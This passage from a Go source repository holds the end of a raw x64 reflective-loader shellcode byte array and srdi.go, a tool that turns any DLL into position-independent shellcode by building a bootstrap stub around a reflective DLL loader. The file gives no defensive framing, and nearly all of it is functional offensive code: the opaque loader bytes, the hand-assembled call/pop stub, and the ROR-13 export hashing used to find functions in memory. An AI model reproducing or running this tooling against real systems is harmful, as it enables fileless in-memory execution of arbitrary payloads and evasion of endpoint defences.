0x00, 0x4D, 0x8D, 0x48, 0x08, 0xE9, 0x93, 0x00, 0x00, 0x00, 0x45, 0x33, 0xFF, 0x41, 0x8B, 0xD7, 0x44, 0x39, 0x7F, 0x54, 0x0F, 0x86, 0x5D, 0xFF, 0xFF, 0xFF, 0x8B, 0xCA, 0x41, 0x03, 0xD6, 0x8A, 0x04, 0x31, 0x88, 0x04, 0x19, 0x3B, 0x57, 0x54, 0x72, 0xF0, 0xE9, 0x48, 0xFF, 0xFF, 0xFF, 0x41, 0x0F, 0xB7, 0x01, 0x0F, 0xB7, 0xC8, 0x66, 0xC1, 0xE9, 0x0C, 0x66, 0x83, 0xF9, 0x0A, 0x75, 0x11, 0x41, 0x8B, 0x08, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x03, 0xC3, 0x4C, 0x01, 0x14, 0x01, 0xEB, 0x49, 0x66, 0x83, 0xF9, 0x03, 0x75, 0x0E, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x41, 0x8B, 0xC2, 0xEB, 0x2E, 0x66, 0x41, 0x3B, 0xCE, 0x75, 0x15, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x49, 0x8B, 0xC2, 0x48, 0xC1, 0xE8, 0x10, 0x0F, 0xB7, 0xC0, 0xEB, 0x13, 0x66, 0x41, 0x3B, 0xCC, 0x75, 0x14, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x41, 0x0F, 0xB7, 0xC2, 0x41, 0x8B, 0x10, 0x48, 0x01, 0x04, 0x0A, 0x4D, 0x03, 0xCC, 0x41, 0x8B, 0x40, 0x04, 0x49, 0x03, 0xC0, 0x4C, 0x3B, 0xC8, 0x75, 0x86, 0x4D, 0x8B, 0xC1, 0x45, 0x39, 0x39, 0x0F, 0x85, 0x4C, 0xFF, 0xFF, 0xFF, 0x4C, 0x8B, 0x65, 0xB7, 0x44, 0x39, 0xBF, 0x94, 0x00, 0x00, 0x00, 0x0F, 0x84, 0x45, 0x01, 0x00, 0x00, 0x44, 0x8B, 0x87, 0x90, 0x00, 0x00, 0x00, 0x45, 0x8B, 0xEF, 0x4C, 0x03, 0xC3, 0x49, 0x8D, 0x40, 0x0C, 0xEB, 0x07, 0x45, 0x03, 0xEE, 0x48, 0x8D, 0x40, 0x14, 0x44, 0x39, 0x38, 0x75, 0xF4, 0x41, 0x8B, 0xC3, 0x83, 0xE0, 0x04, 0x89, 0x45, 0xB3, 0x0F, 0x84, 0x82, 0x00, 0x00, 0x00, 0x45, 0x3B, 0xEE, 0x76, 0x7D, 0x41, 0xC1, 0xEB, 0x10, 0x45, 0x8D, 0x4D, 0xFF, 0x44, 0x89, 0x5D, 0x7F, 0x45, 0x8B, 0xDF, 0x45, 0x85, 0xC9, 0x74, 0x6F, 0x4D, 0x8B, 0xD0, 0x41, 0x0F, 0x10, 0x02, 0x33, 0xD2, 0x41, 0x8B, 0xCD, 0x41, 0x2B, 0xCB, 0x69, 0xF6, 0xFD, 0x43, 0x03, 0x00, 0xB8, 0xFF, 0x7F, 0x00, 0x00, 0xF7, 0xF1, 0x33, 0xD2, 0x81, 0xC6, 0xC3, 0x9E, 0x26, 0x00, 0x41, 0x8D, 0x0C, 0x06, 0x8B, 0xC6, 0xC1, 0xE8, 0x10, 0x25, 0xFF, 0x7F, 0x00, 0x00, 0xF7, 0xF1, 0x41, 0x03, 0xC3, 0x45, 0x03, 0xDE, 0x48, 0x8D, 0x0C, 0x80, 0x41, 0x8B, 
0x54, 0x88, 0x10, 0x41, 0x0F, 0x10, 0x0C, 0x88, 0x41, 0x0F, 0x11, 0x04, 0x88, 0x41, 0x8B, 0x42, 0x10, 0x41, 0x89, 0x44, 0x88, 0x10, 0x41, 0x0F, 0x11, 0x0A, 0x41, 0x89, 0x52, 0x10, 0x4D, 0x8D, 0x52, 0x14, 0x45, 0x3B, 0xD9, 0x72, 0x9C, 0xEB, 0x06, 0x8B, 0x45, 0xB3, 0x89, 0x45, 0x7F, 0x8B, 0xB7, 0x90, 0x00, 0x00, 0x00, 0x48, 0x03, 0xF3, 0x8B, 0x46, 0x0C, 0x85, 0xC0, 0x74, 0x7B, 0x8B, 0x7D, 0x7F, 0x8B, 0xC8, 0x48, 0x03, 0xCB, 0x41, 0xFF, 0xD4, 0x44, 0x8B, 0x3E, 0x4C, 0x8B, 0xE0, 0x44, 0x8B, 0x76, 0x10, 0x4C, 0x03, 0xFB, 0x4C, 0x03, 0xF3, 0x49, 0x8B, 0x0F, 0x48, 0x85, 0xC9, 0x74, 0x2D, 0x48, 0x8B, 0x7D, 0xBF, 0x79, 0x05, 0x0F, 0xB7, 0xD1, 0xEB, 0x07, 0x48, 0x8D, 0x51, 0x02, 0x48, 0x03, 0xD3, 0x49, 0x8B, 0xCC, 0xFF, 0xD7, 0x49, 0x83, 0xC7, 0x08, 0x49, 0x89, 0x06, 0x49, 0x83, 0xC6, 0x08, 0x49, 0x8B, 0x0F, 0x48, 0x85, 0xC9, 0x75, 0xDA, 0x8B, 0x7D, 0x7F, 0x45, 0x33, 0xFF, 0x44, 0x39, 0x7D, 0xB3, 0x74, 0x0F, 0x41, 0x83, 0xFD, 0x01, 0x76, 0x09, 0x69, 0xCF, 0xE8, 0x03, 0x00, 0x00, 0xFF, 0x55, 0xC7, 0x8B, 0x46, 0x20, 0x48, 0x83, 0xC6, 0x14, 0x4C, 0x8B, 0x65, 0xB7, 0x85, 0xC0, 0x75, 0x8C, 0x48, 0x8B, 0x7D, 0xCF, 0x4C, 0x8B, 0x6D, 0xBF, 0x44, 0x39, 0xBF, 0xF4, 0x00, 0x00, 0x00, 0x74, 0x68, 0x44, 0x8B, 0xB7, 0xF0, 0x00, 0x00, 0x00, 0x49, 0x83, 0xC6, 0x04, 0x4C, 0x03, 0xF3, 0xEB, 0x53, 0x41, 0x8B, 0x0E, 0x48, 0x03, 0xCB, 0x41, 0xFF, 0xD4, 0x41, 0x8B, 0x76, 0x08, 0x4C, 0x8B, 0xE0, 0x45, 0x8B, 0x7E, 0x0C, 0x48, 0x03, 0xF3, 0x4C, 0x03, 0xFB, 0xEB, 0x25, 0x49, 0x8B, 0x0F, 0x48, 0x85, 0xC9, 0x79, 0x05, 0x0F, 0xB7, 0xD1, 0xEB, 0x07, 0x48, 0x8D, 0x51, 0x02, 0x48, 0x03, 0xD3, 0x49, 0x8B, 0xCC, 0x41, 0xFF, 0xD5, 0x48, 0x89, 0x06, 0x48, 0x83, 0xC6, 0x08, 0x49, 0x83, 0xC7, 0x08, 0x33, 0xC0, 0x48, 0x39, 0x06, 0x75, 0xD4, 0x4C, 0x8B, 0x65, 0xB7, 0x49, 0x83, 0xC6, 0x20, 0x45, 0x33, 0xFF, 0x45, 0x39, 0x3E, 0x75, 0xA8, 0x45, 0x8B, 0xF7, 0x0F, 0xB7, 0x47, 0x14, 0x41, 0xBC, 0x01, 0x00, 0x00, 0x00, 0x66, 0x44, 0x3B, 0x7F, 0x06, 0x0F, 0x83, 0xCF, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0x7D, 0xD7, 0x48, 0x8D, 
0x77, 0x3C, 0x48, 0x03, 0xF0, 0x45, 0x33, 0xC9, 0x44, 0x39, 0x4E, 0xEC, 0x0F, 0x84, 0xA0, 0x00, 0x00, 0x00, 0x8B, 0x0E, 0x8B, 0xD1, 0xC1, 0xEA, 0x1E, 0x8B, 0xC1, 0x41, 0x23, 0xD4, 0xC1, 0xE8, 0x1D, 0xC1, 0xE9, 0x1F, 0x41, 0x23, 0xC4, 0x75, 0x24, 0x85, 0xD2, 0x75, 0x0E, 0xF7, 0xD9, 0x45, 0x1B, 0xC0, 0x41, 0x83, 0xE0, 0x07, 0x45, 0x03, 0xC4, 0xEB, 0x4F, 0xF7, 0xD9, 0xB8, 0x02, 0x00, 0x00, 0x00, 0x45, 0x1B, 0xC0, 0x44, 0x23, 0xC0, 0x44, 0x03, 0xC0, 0xEB, 0x3D, 0x85, 0xD2, 0x75, 0x20, 0x85, 0xC9, 0x75, 0x06, 0x44, 0x8D, 0x42, 0x10, 0xEB, 0x2F, 0x85, 0xD2, 0x75, 0x12, 0x85, 0xC9, 0x74, 0x08, 0x41, 0xB8, 0x80, 0x00, 0x00, 0x00, 0xEB, 0x1F, 0x44, 0x8B, 0x45, 0xAF, 0xEB, 0x1D, 0x85, 0xC9, 0x75, 0x06, 0x44, 0x8D, 0x41, 0x20, 0xEB, 0x0F, 0x44, 0x8B, 0x45, 0xAF, 0x85, 0xC9, 0xB8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x0F, 0x45, 0xC0, 0x44, 0x89, 0x45, 0xAF, 0xF7, 0x06, 0x00, 0x00, 0x00, 0x04, 0x74, 0x09, 0x41, 0x0F, 0xBA, 0xE8, 0x09, 0x44, 0x89, 0x45, 0xAF, 0x8B, 0x4E, 0xE8, 0x4C, 0x8D, 0x4D, 0xAF, 0x8B, 0x56, 0xEC, 0x48, 0x03, 0xCB, 0x41, 0xFF, 0xD7, 0x45, 0x33, 0xC9, 0x0F, 0xB7, 0x47, 0x06, 0x45, 0x03, 0xF4, 0x48, 0x83, 0xC6, 0x28, 0x44, 0x3B, 0xF0, 0x0F, 0x82, 0x42, 0xFF, 0xFF, 0xFF, 0x45, 0x33, 0xFF, 0x45, 0x33, 0xC0, 0x33, 0xD2, 0x48, 0x83, 0xC9, 0xFF, 0xFF, 0x55, 0xDF, 0x44, 0x39, 0xBF, 0xD4, 0x00, 0x00, 0x00, 0x74, 0x24, 0x8B, 0x87, 0xD0, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x74, 0x18, 0x18, 0xEB, 0x0F, 0x45, 0x33, 0xC0, 0x41, 0x8B, 0xD4, 0x48, 0x8B, 0xCB, 0xFF, 0xD0, 0x48, 0x8D, 0x76, 0x08, 0x48, 0x8B, 0x06, 0x48, 0x85, 0xC0, 0x75, 0xE9, 0x8B, 0x47, 0x28, 0x4D, 0x8B, 0xC4, 0x48, 0x03, 0xC3, 0x41, 0x8B, 0xD4, 0x48, 0x8B, 0xCB, 0xFF, 0xD0, 0x8B, 0x75, 0x67, 0x85, 0xF6, 0x0F, 0x84, 0x96, 0x00, 0x00, 0x00, 0x44, 0x39, 0xBF, 0x8C, 0x00, 0x00, 0x00, 0x0F, 0x84, 0x89, 0x00, 0x00, 0x00, 0x8B, 0x8F, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xCB, 0x44, 0x8B, 0x59, 0x18, 0x45, 0x85, 0xDB, 0x74, 0x77, 0x44, 0x39, 0x79, 0x14, 0x74, 0x71, 0x44, 0x8B, 0x49, 0x20, 0x41, 0x8B, 0xFF, 0x8B, 0x51, 0x24, 
0x4C, 0x03, 0xCB, 0x48, 0x03, 0xD3, 0x45, 0x85, 0xDB, 0x74, 0x5C, 0x45, 0x8B, 0x01, 0x45, 0x8B, 0xD7, 0x4C, 0x03, 0xC3, 0x74, 0x51, 0xEB, 0x10, 0x0F, 0xBE, 0xC0, 0x41, 0x03, 0xC2, 0x44, 0x8B, 0xD0, 0x41, 0xC1, 0xCA, 0x0D, 0x4D, 0x03, 0xC4, 0x41, 0x8A, 0x00, 0x84, 0xC0, 0x75, 0xE9, 0x41, 0x3B, 0xF2, 0x75, 0x05, 0x48, 0x85, 0xD2, 0x75, 0x16, 0xB8, 0x02, 0x00, 0x00, 0x00, 0x41, 0x03, 0xFC, 0x48, 0x03, 0xD0, 0x49, 0x83, 0xC1, 0x04, 0x41, 0x3B, 0xFB, 0x73, 0x1A, 0xEB, 0xBC, 0x8B, 0x49, 0x1C, 0x0F, 0xB7, 0x12, 0x48, 0x03, 0xCB, 0x8B, 0x04, 0x91, 0x8B, 0x55, 0x77, 0x48, 0x03, 0xC3, 0x48, 0x8B, 0x4D, 0x6F, 0xFF, 0xD0, 0x48, 0x8B, 0xC3, 0xEB, 0x02, 0x33, 0xC0, 0x48, 0x8B, 0x9C, 0x24, 0xD0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xC4, 0x90, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5F, 0x5E, 0x5D, 0xC3, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xEC, 0x10, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x8B, 0xF1, 0x48, 0x8B, 0x50, 0x18, 0x4C, 0x8B, 0x4A, 0x10, 0x4D, 0x8B, 0x41, 0x30, 0x4D, 0x85, 0xC0, 0x0F, 0x84, 0xB4, 0x00, 0x00, 0x00, 0x41, 0x0F, 0x10, 0x41, 0x58, 0x49, 0x63, 0x40, 0x3C, 0x33, 0xD2, 0x4D, 0x8B, 0x09, 0xF3, 0x0F, 0x7F, 0x04, 0x24, 0x42, 0x8B, 0x9C, 0x00, 0x88, 0x00, 0x00, 0x00, 0x85, 0xDB, 0x74, 0xD4, 0x48, 0x8B, 0x04, 0x24, 0x48, 0xC1, 0xE8, 0x10, 0x44, 0x0F, 0xB7, 0xD0, 0x45, 0x85, 0xD2, 0x74, 0x21, 0x48, 0x8B, 0x4C, 0x24, 0x08, 0x45, 0x8B, 0xDA, 0x0F, 0xBE, 0x01, 0xC1, 0xCA, 0x0D, 0x80, 0x39, 0x61, 0x7C, 0x03, 0x83, 0xC2, 0xE0, 0x03, 0xD0, 0x48, 0xFF, 0xC1, 0x49, 0x83, 0xEB, 0x01, 0x75, 0xE7, 0x4D, 0x8D, 0x14, 0x18, 0x33, 0xC9, 0x41, 0x8B, 0x7A, 0x20, 0x49, 0x03, 0xF8, 0x41, 0x39, 0x4A, 0x18, 0x76, 0x8F, 0x8B, 0x1F, 0x45, 0x33, 0xDB, 0x49, 0x03, 0xD8, 0x48, 0x8D, 0x7F, 0x04, 0x0F, 0xBE, 0x03, 0x48, 0xFF, 0xC3, 0x41, 0xC1, 0xCB, 0x0D, 0x44, 0x03, 0xD8, 0x80, 0x7B, 0xFF, 0x00, 0x75, 0xED, 0x41, 0x8D, 0x04, 0x13, 0x3B, 0xC6, 0x74, 0x0D, 0xFF, 0xC1, 0x41, 0x3B, 0x4A, 0x18, 0x72, 0xD1, 
0xE9, 0x5B, 0xFF, 0xFF, 0xFF, 0x41, 0x8B, 0x42, 0x24, 0x03, 0xC9, 0x49, 0x03, 0xC0, 0x0F, 0xB7, 0x14, 0x01, 0x41, 0x8B, 0x4A, 0x1C, 0x49, 0x03, 0xC8, 0x8B, 0x04, 0x91, 0x49, 0x03, 0xC0, 0xEB, 0x02, 0x33, 0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x20, 0x48, 0x8B, 0x74, 0x24, 0x28, 0x48, 0x83, 0xC4, 0x10, 0x5F, 0xC3}
)
--------------------------------------------------------------------------------
/srdi.go:
--------------------------------------------------------------------------------
package main

import (
	"encoding/binary"
	"fmt"
	"io/ioutil"
	"log"
	"math"
	"os"
	"path"
	"path/filepath"
	"strings"
)

// main is the command-line entry point: it reads the DLL named by the first
// argument, hands it to ShellcodeRDIFromBytes, writes the result next to the
// input with the ".dll" suffix replaced by ".bin" (mode 0700) and prints the
// output path.
//
// Positional arguments: os.Args[1] is the DLL path, os.Args[2] the user-data
// string, os.Args[3] the exported function name (default "blah"). Any count
// outside 2..4 prints the usage line and exits with status 1. Note that the
// user-data string is only consumed when exactly three arguments are given;
// with four arguments os.Args[2] is not read and user data stays empty. Read
// and write failures go through log.Panic.
func main() {
	argc := len(os.Args)
	if argc < 2 || argc > 4 {
		fmt.Println("Args error")
		fmt.Println(os.Args[0] + " [dllName] [Args(not necessary)] [entryPoint(not necessary)]")
		os.Exit(1)
	}

	dllPath := os.Args[1]

	userArgs := ""
	funcName := "blah"
	switch argc {
	case 3:
		userArgs = os.Args[2]
	case 4:
		funcName = os.Args[3]
	}

	dllBytes, err := ioutil.ReadFile(dllPath)
	if err != nil {
		log.Panic(err)
	}

	blob, err := ShellcodeRDIFromBytes(dllBytes, funcName, userArgs)
	if err != nil {
		log.Panic(err)
	}

	// Output lands in the same directory as the input; only the first ".dll"
	// occurrence in the base name is rewritten.
	outPath := filepath.Join(path.Dir(dllPath), strings.Replace(path.Base(dllPath), ".dll", ".bin", 1))
	if err = ioutil.WriteFile(outPath, blob, 0700); err != nil {
		log.Panic(err)
	}
	fmt.Println(outPath)
}
/*

// ShellcodeRDIToFile generates a sRDI shellcode and writes it to a file
func ShellcodeRDIToFile(dllPath string, functionName string) (shellcodePath string, err error) {
	shellcode, err := ShellcodeRDI(dllPath, functionName, "")
	if err != nil {
		return "", err
	}
	dir := path.Dir(dllPath)
	filename := strings.Replace(path.Base(dllPath), ".dll", ".bin", 1)
	filepath := filepath.Join(dir,
filename)
	ioutil.WriteFile(filepath, shellcode, 0700)
	return filepath, nil
}

// ShellcodeRDI generates a reflective shellcode based on a DLL file
func ShellcodeRDI(dllPath string, functionName string, userdata string) (shellcode []byte, err error) {
	// handle command line arguments, -h or -help shows the menu
	userDataStr := userdata
	clearHeader := true

	dllBytes, err := ioutil.ReadFile(dllPath)
	if err != nil {
		return []byte{}, err
	}

	// functionHash is 0x10 by default, otherwise get the hash and convert to bytes
	var hashFunction []byte
	if functionName != "" {
		hashFunctionUint32 := hashFunctionName(functionName)
		hashFunction = pack(hashFunctionUint32)
	} else {
		hashFunction = pack(uint32(0x10))
	}

	flags := 0
	if clearHeader {
		flags |= 0x1
	}
	var userData []byte
	if userDataStr != "" {
		userData = []byte(userDataStr)
	}
	shellcode = convertToShellcode(dllBytes, hashFunction, userData, flags)
	// err = os.RemoveAll(path.Clean(path.Dir(dllPath) + "/../"))
	return shellcode, nil

}

*/

// ShellcodeRDIFromBytes builds a sRDI blob from an in-memory DLL image.
//
// data is the raw DLL file contents. functionName is the export name whose
// ROR-13 hash (hashFunctionName) is embedded for the loader; an empty name
// embeds the fixed value 0x10 instead. arguments is an optional string that is
// appended after the DLL as user data; when empty, userData stays nil and
// convertToShellcode substitutes the literal "None".
//
// clearHeader is hard-wired to true, so bit 0x1 of flags is always set (how the
// loader blob interprets that bit is not visible in this file). The err result
// is always nil; the (shellcode, err) shape is kept for callers that check it.
func ShellcodeRDIFromBytes(data []byte, functionName string, arguments string) (shellcode []byte, err error) {

	clearHeader := true
	userDataStr := arguments

	// functionHash is 0x10 by default, otherwise get the hash and convert to bytes
	var hashFunction []byte
	if functionName != "" {
		hashFunctionUint32 := hashFunctionName(functionName)
		hashFunction = pack(hashFunctionUint32)
	} else {
		hashFunction = pack(uint32(0x10))
	}

	flags := 0
	if clearHeader {
		flags |= 0x1
	}
	var userData []byte
	if userDataStr != "" {
		userData = []byte(userDataStr)
	}
	shellcode = convertToShellcode(data, hashFunction, userData, flags)
	return shellcode, nil
}

// convertToShellcode lays the output out as
//
//	[bootstrap stub][rdiShellcode64 or rdiShellcode32][dllBytes][userData]
//
// The stub is position independent: it executes a call to the next
// instruction and pops the return address to learn where it is running, then
// adds fixed offsets (dllOffset, userDataLocation) to derive pointers to the
// appended DLL and user data before calling into the loader blob with the
// function hash, user-data pointer/length and flags as arguments. The branch
// is chosen by is64BitDLL.
//
// Both stubs are fixed-size (bootstrapSize: 64 bytes for x64, 45 for x86) and
// dllOffset/userDataLocation are derived from that constant plus
// len(rdiShellcodeNN) and len(dllBytes), so any edit to the emitted bytes must
// keep bootstrapSize in step; nothing at the end asserts
// len(bootstrap) == bootstrapSize (both branches currently tally exactly).
// The call displacement is written as a single byte followed by three zero
// bytes, which is only valid while the remaining stub length is below 256.
//
// Note for analysts: the DLL image is appended unmodified, so the input's PE
// headers remain in cleartext in the output, and the leading stub bytes
// (call/pop sequence and the mov/add opcodes below) are constant across every
// blob this function produces.
func convertToShellcode(dllBytes, functionHash, userData []byte, flags int) []byte {

	// A nil userData would give the loader a zero-length buffer; the original
	// tool substitutes the four-byte string "None" instead.
	if userData == nil {
		userData = []byte("None")
	}

	var final []byte

	if is64BitDLL(dllBytes) {
		// do 64 bit things

		bootstrapSize := 64

		// call next instruction (Pushes next instruction address to stack)
		bootstrap := []byte{0xe8, 0x00, 0x00, 0x00, 0x00}

		// Set the offset to our DLL from pop result: the popped address is
		// 5 bytes into the stub, so the DLL starts (bootstrapSize - 5 +
		// len(loader)) bytes further on.
		dllOffset := bootstrapSize - len(bootstrap) + len(rdiShellcode64)

		// pop rcx - Capture our current location in memory
		bootstrap = append(bootstrap, 0x59)

		// mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
		bootstrap = append(bootstrap, 0x49, 0x89, 0xc8)

		// add rcx, <dllOffset> (imm32 follows)
		bootstrap = append(bootstrap, 0x48, 0x81, 0xc1)

		bootstrap = append(bootstrap, pack(uint32(dllOffset))...)

		// mov edx, <functionHash> (the 4 hash bytes follow)
		bootstrap = append(bootstrap, 0xba)
		bootstrap = append(bootstrap, functionHash...)

		// Setup the location of our user data
		// add r8, <userDataLocation> - DLL offset plus DLL length
		bootstrap = append(bootstrap, 0x49, 0x81, 0xc0)
		userDataLocation := dllOffset + len(dllBytes)
		bootstrap = append(bootstrap, pack(uint32(userDataLocation))...)

		// mov r9d, <len(userData)>
		bootstrap = append(bootstrap, 0x41, 0xb9)
		bootstrap = append(bootstrap, pack(uint32(len(userData)))...)

		// push rsi - save original value
		bootstrap = append(bootstrap, 0x56)

		// mov rsi, rsp - store our current stack pointer for later
		bootstrap = append(bootstrap, 0x48, 0x89, 0xe6)

		// and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
		bootstrap = append(bootstrap, 0x48, 0x83, 0xe4, 0xf0)

		// sub rsp, 0x30 - Create some breathing room on the stack
		bootstrap = append(bootstrap, 0x48, 0x83, 0xec)
		bootstrap = append(bootstrap, 0x30) // 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment

		// mov dword ptr [rsp + 0x20], <flags> - Push arg 5 just above shadow space
		bootstrap = append(bootstrap, 0xC7, 0x44, 0x24)
		bootstrap = append(bootstrap, 0x20)
		bootstrap = append(bootstrap, pack(uint32(flags))...)

		// call - Transfer execution to the RDI
		bootstrap = append(bootstrap, 0xe8)
		// rel32 = bytes left in the stub after this 5-byte call; written as one
		// byte plus three zero bytes, so it must stay below 256.
		bootstrap = append(bootstrap, byte(bootstrapSize-len(bootstrap)-4)) // Skip over the remainder of instructions
		bootstrap = append(bootstrap, 0x00, 0x00, 0x00)

		// mov rsp, rsi - Reset our original stack pointer
		bootstrap = append(bootstrap, 0x48, 0x89, 0xf4)

		// pop rsi - Put things back where we left them
		bootstrap = append(bootstrap, 0x5e)

		// ret - return to caller
		bootstrap = append(bootstrap, 0xc3)

		// Final layout: stub, loader, DLL image (unmodified), user data.
		final = append(bootstrap, rdiShellcode64...)
		final = append(final, dllBytes...)
		final = append(final, userData...)

	} else {
		// do 32 bit things

		bootstrapSize := 45

		// call next instruction (Pushes next instruction address to stack)
		bootstrap := []byte{0xe8, 0x00, 0x00, 0x00, 0x00}

		// Set the offset to our DLL from pop result (same arithmetic as the
		// 64-bit branch, against the 32-bit loader's length).
		dllOffset := bootstrapSize - len(bootstrap) + len(rdiShellcode32)

		// pop eax - Capture our current location in memory
		bootstrap = append(bootstrap, 0x58)

		// mov ebx, eax - copy our location in memory to ebx before we start modifying eax
		bootstrap = append(bootstrap, 0x89, 0xc3)

		// add eax, <dllOffset>
		bootstrap = append(bootstrap, 0x05)
		bootstrap = append(bootstrap, pack(uint32(dllOffset))...)

		// add ebx, <userDataLocation> - DLL offset plus DLL length
		bootstrap = append(bootstrap, 0x81, 0xc3)
		userDataLocation := dllOffset + len(dllBytes)
		bootstrap = append(bootstrap, pack(uint32(userDataLocation))...)

		// push <flags> - cdecl arguments are pushed right to left below
		bootstrap = append(bootstrap, 0x68)
		bootstrap = append(bootstrap, pack(uint32(flags))...)

		// push <len(userData)>
		bootstrap = append(bootstrap, 0x68)
		bootstrap = append(bootstrap, pack(uint32(len(userData)))...)

		// push ebx - user data pointer
		bootstrap = append(bootstrap, 0x53)

		// push <functionHash>
		bootstrap = append(bootstrap, 0x68)
		bootstrap = append(bootstrap, functionHash...)

		// push eax - DLL pointer
		bootstrap = append(bootstrap, 0x50)

		// call - Transfer execution to the RDI
		bootstrap = append(bootstrap, 0xe8)
		// rel32 written as one byte plus three zero bytes (see 64-bit branch).
		bootstrap = append(bootstrap, byte(bootstrapSize-len(bootstrap)-4)) // Skip over the remainder of instructions
		bootstrap = append(bootstrap, 0x00, 0x00, 0x00)

		// add esp, 0x14 - correct the stack pointer (five 4-byte arguments)
		bootstrap = append(bootstrap, 0x83, 0xc4, 0x14)

		// ret - return to caller
		bootstrap = append(bootstrap, 0xc3)

		// Final layout: stub, loader, DLL image (unmodified), user data.
		final = append(bootstrap, rdiShellcode32...)
		final = append(final, dllBytes...)
		final = append(final, userData...)
	}

	return final

}

// pack encodes val as four little-endian bytes (the equivalent of Python's
// struct.pack("<I", val)); used for every immediate the stub embeds.
func pack(val uint32) []byte {
	bytes := make([]byte, 4)
	binary.LittleEndian.PutUint32(bytes, val)
	return bytes
}

// hashFunctionName returns the ROR-13 hash of name: for each byte of the name
// plus a terminating NUL, rotate the running hash right by 13 and add the
// byte. The loader blob is expected to use the same scheme to match exports,
// but that logic lives in the opaque rdiShellcode arrays and is not visible
// here. The author's reference value: "HelloWorld" = 3571859646.
func hashFunctionName(name string) uint32 {
	function := []byte(name)
	function = append(function, 0x00)

	functionHash := uint32(0)

	for _, b := range function {
		functionHash = ror(functionHash, 13, 32)
		functionHash += uint32(b)
	}

	return functionHash
}

// ror rotates val right by rBits within a maxBits-wide word (ROR-13 when
// called with 13, 32).
//
// NOTE(review): for maxBits == 32, uint32(math.Exp2(32)) is an out-of-range
// float-to-integer conversion, which the Go spec leaves implementation-
// dependent; the mask only becomes 0xFFFFFFFF because that conversion yields 0
// on common targets before the subtraction — TODO confirm on every build
// target, or derive the mask without going through a float (math/bits
// RotateLeft32 with a negative count gives the same rotation directly).
func ror(val uint32, rBits uint32, maxBits uint32) uint32 {
	exp := uint32(math.Exp2(float64(maxBits))) - 1
	return ((val & exp) >> (rBits % maxBits)) | (val << (maxBits - (rBits % maxBits)) & exp)
}

// is64BitDLL reports whether the PE image in dllBytes targets a 64-bit
// machine: it reads e_lfanew at offset 0x3C, then the Machine field 4 bytes
// past the PE signature, and accepts IA64 (0x200 = 512) and AMD64
// (0x8664 = 34404) only; any other value, including ARM64, is treated as
// 32-bit.
//
// No length or signature validation is done: a buffer shorter than 64 bytes,
// or an e_lfanew that points past the end of the buffer, makes a slice
// expression panic (index out of range) rather than return an error, and a
// non-PE input is still classified by whatever bytes sit at those offsets.
func is64BitDLL(dllBytes []byte) bool {
	machineIA64 := uint16(512)
	machineAMD64 := uint16(34404)

	headerOffset := binary.LittleEndian.Uint32(dllBytes[60:64])
	machine := binary.LittleEndian.Uint16(dllBytes[headerOffset+4 : headerOffset+4+2])

	// 64 bit
	if machine == machineIA64 || machine == machineAMD64 {
		return true
	}
	return false
}
--------------------------------------------------------------------------------
